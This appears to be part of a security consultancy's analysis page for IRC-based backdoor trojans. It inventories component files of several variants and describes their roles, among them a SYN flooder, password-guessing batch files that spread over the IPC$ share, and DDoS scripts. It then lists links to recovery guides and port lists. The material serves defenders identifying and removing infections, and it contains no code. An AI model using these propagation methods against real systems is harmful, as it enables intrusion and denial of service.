    DDSHARE.EXE - denial of service program, SYN flooder.
    TASK32.EXE - mIRC version 5.7
    WinClock.exe - mIRC version 5.7
    hide.exe - hide-window program
    remote.ini - mIRC scripts
    secureme - ? (not confirmed)
    win32.mrc - ? (not confirmed)
    start.bat - batch file called first to compromise systems. It contains the guessable user IDs and passwords and targets the \\[system]\IPC$ share.
    servudaemon.exe - ServU FTP Server, use to 
    ColdBot.exe - the worm/Trojan package, a self-extracting zip file. When executed, it unzips the above files into the Windows system32 directory.

    -----------------------------------------------------------------------
    Files in TROJ_FLOOD.BI.DR / IRC_ZCREW Trojan variant - source: Trend Micro
    -----------------------------------------------------------------------

    bootdrv.dll - A non-malicious mIRC add-on utility that displays system information.
    explore.dat - A non-malicious text file.
    explore.exe - Detected as TROJ_GLITCH.B.  This file loads the component explorer.exe when executed.
    explorer.exe - Detected as BKDR_IRCFLOOD.BI.  This file is a modified mIRC application that acts as the server part of the whole backdoor package.
    iiscache.dll - Detected as IRC_ZCREW.A.  This is an IRC script used by the backdoor server.
    libparse.exe - A non-malicious utility that enables the user to display and terminate running processes.
    navdb.dbx - A non-malicious text file containing a list of words used by the modified mIRC application as IRC nicks.
    psexec.exe - A non-malicious utility for Windows NT and 2000 systems that enables the user to execute processes on remote systems without having to install a client component.  However, logon credentials must be supplied in order to execute processes.
    rcfg.ini - An IRC script file used by the backdoor.
    rconnect.exe - A non-malicious utility that is a fully standards-compliant FTP server implementation.
    rconnect.conf - A logon script for use with rconnect.exe.
    SECURE.BAT - Detected as BAT_ZCREW.A.  This batch file removes all default network shares and stops system services such as Remote Access Connection Manager, telnet, messenger, and NetBIOS.
    server.txt - A non-malicious log file.
    str.vxd - A non-malicious text file.
    svchost32.exe - A non-malicious utility used to hide the window of a program.
    symbiox.dll - An IRC script used by the backdoor.
    v32driver.bat - Detected as BAT_ZCREW.A.  This batch file attempts to log on to another machine on the local area network as Administrator using a list of passwords.  If the logon is successful, it copies and executes this Trojan on the compromised remote machine.
    web.swf - Detected as IRC_ZCREW.A.  This is an IRC script used by the backdoor.
    www\MDX.DLL - DLL used by the backdoor.
    www\moo.dll - DLL used by the backdoor.
    www\VIEWS.MDX - DLL used by the backdoor.
    www\webserv.mrc - An IRC script used by the backdoor.
    www\htdocs\readme.htm - A non-malicious text file.
    www\htdocs\shik.gif - A non-malicious image file.

    -----------------------------------------------------------------------
    Files in Worm.Win32.Randon Trojan variant - source: viruslist.com
    -----------------------------------------------------------------------

    Deta.exe - HideWindows utility (Win32 EXE file).
    fControl.a - An IRC script (port scanning and infection of remote computers).
    IfControl.a - An IRC script (IRC channel flooding and DDoS attacks by pinging different addresses).
    incs.bat - Batch file (LAN resource password cracker).
    Libparse.exe - The "PrcView" utility (Win32 EXE file).
    psexec.exe - The "PsExec" utility (Win32 EXE file).
    rcfg.ini - IRC INI file (loads other scripts).
    rconnect.conf - Configuration file.
    reader.w - List of nicknames used by the worm to establish connections to IRC channels.
    Sa.exe - TrojanDownloader.Win32.Apher.
    scontrol.a - Helper IRC script.
    sencs.bat - Batch file (this file is transferred to the remote computer to execute the TrojanDownloader).
    systrey.exe - Renamed mIRC client (Win32 EXE file).

    ----------------------------------------------------
    Trojan variants might include these programs
    ----------------------------------------------------
    Serv-U FTP
    Raiden FTP
    FlashFXP
    Fire Daemon

 Part 1 and Part 2 of the original analysis on Google Discussion Group:

  1. ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 1:

  2. ocxdll.exe / mIRC Trojan Analysis posted on Google Discussion Group, Part 2:


Additional resources on recovery:

    CERT - Steps for Recovering from a UNIX or NT System Compromise
    Compromised Computer Identification and Fixing Guidelines by Allen Chang at UC Berkeley

Additional resources on Trojan Horses:

    Complete Windows Trojans Paper
    Distributed Denial of Service (DDoS) Attacks/tools

mIRC Trojan Variants:

    TrendMicro TROJ_FLOOD.BI.DR / IRC_ZCREW Trojan Analysis
    VirusList Worm.Win32.Randon worm/Trojan

Trojan Ports lists:

    http://www.blackcode.com/trojans/ports.php
    http://www.sans.org/resources/idfaq/oddports.php
    http://www.govital.net/~soz/lists/Port_Lists.htm
    http://www.iss.net/security_center/advice/Exploits/Ports/default.htm

IETF Assigned Ports:

    http://www.iana.org/assignments/port-numbers


Copyright 2002-2011 KLC Consulting, Inc.
All rights reserved.